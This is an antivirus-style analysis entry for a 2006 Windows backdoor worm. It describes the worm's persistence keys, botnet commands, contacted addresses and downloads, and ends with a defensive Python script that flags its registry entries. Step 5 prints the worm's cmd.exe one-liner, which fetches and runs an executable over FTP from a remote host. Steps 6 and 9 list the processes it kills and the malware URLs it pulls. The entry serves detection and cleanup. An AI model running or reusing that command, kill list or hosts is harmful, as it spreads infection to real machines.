Overview
Virus alias:
Processing date: 2006-08-29
Threat level: ★
Chinese name: 網賊
Virus type: Worm
Affected systems: Win 9x/ME, Win 2000/NT, Win XP, Win 2003
Virus behavior:
This is a worm that spreads over the network. It attempts to update itself, opens a backdoor that accepts commands from a controller, terminates security software, and turns the infected machine into a network zombie.
1. Creates the file:
%System%\mmsvc32.exe
2. Adds startup entries so that the virus runs at boot:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
3. Searches for and closes the processes owning the following windows, then registers a window of the same name itself so that they cannot be opened:
DBMWin
TDBMWin
4. Deletes the following registry values:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft IIS
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
PayTime
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
lp3mr1sh
5. Creates a thread that runs the following command:
cmd.exe /c echo user [email protected]>ntsdd.txt
&& echo f729lQjd >>ntsdd.txt
&& echo binary>>ntsdd.txt
&& echo get mmf32.exe >>ntsdd.txt
&& echo quit>>ntsdd.txt
&& ftp -s:ntsdd.txt -n -nnpyf.cplnn.com
&& del ntsdd.txt
&& mmf32.exe
6. Runs the following commands to terminate security-software processes:
!proc.kill.* ftp.exe
!proc.kill.* tftp.exe
!proc.kill.* nh.exe
!proc.kill.* nethost.exe
!proc.kill.* syshost.exe
!proc.kill.* ppc.exe
!proc.kill.* paytime.exe
!proc.kill.* lp3mr1sh.exe
!proc.kill.* tibs.exe
!proc.kill.* opera.exe
!proc.kill.* netscape.exe
7. Attempts to connect to the following addresses:
http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock
8. Accepts the following commands:
!HTTP.DOS
!UDP.DDOS
!PROC.KILL
!RUN
!URL.DOWNLOAD
!UPDATE
!AFTP.CONFIG
!URL.SPOOF
!IE.COUNTER
9. Attempts to download the following files:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe
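As an added defender-side example (not part of the original entry or the vendor's tooling), the following Python parses a registry export and flags the Run entries described in step 2, matching on the value name and on the executable name so a full path to mmsvc32.exe is caught as well. The .reg text and its two benign entries ("OneDrive", "SecurityHealth") are constructed for illustration.

```python
import re

# Indicators taken from the entry above (added example, not the vendor's tooling).
RUN_VALUE_NAME = "Microsoft Network Services Controller"
RUN_VALUE_DATA = "mmsvc32.exe"
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}

# Constructed .reg export; "OneDrive" and "SecurityHealth" are hypothetical
# benign entries included to show that they are not flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
"Microsoft Network Services Controller"="mmsvc32.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Microsoft Network Services Controller"="C:\\WINDOWS\\system32\\mmsvc32.exe"
'''

_KEY = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^"([^"]*)"="((?:[^"\\]|\\.)*)"$')


def parse_reg(text):
    """Yield (key, value_name, value_data) for each REG_SZ value in a .reg dump."""
    key = None
    for line in text.splitlines():
        if m := _KEY.match(line):
            key = m.group(1)
        elif (m := _VALUE.match(line)) and key is not None:
            # .reg files escape backslashes as "\\"; undo that before matching.
            yield key, m.group(1), m.group(2).replace("\\\\", "\\")


def find_persistence(text):
    """Return Run entries matching the worm's value name or its executable name."""
    hits = []
    for key, name, data in parse_reg(text):
        # Compare on the data's basename so a full path to mmsvc32.exe is caught too.
        exe = data.lower().rsplit("\\", 1)[-1]
        if key.lower() in RUN_KEYS and (name == RUN_VALUE_NAME or exe == RUN_VALUE_DATA):
            hits.append((key, name, data))
    return hits
```

Feed it the output of `reg export` for both Run keys; each returned tuple is an autorun entry worth removing alongside %System%\mmsvc32.exe.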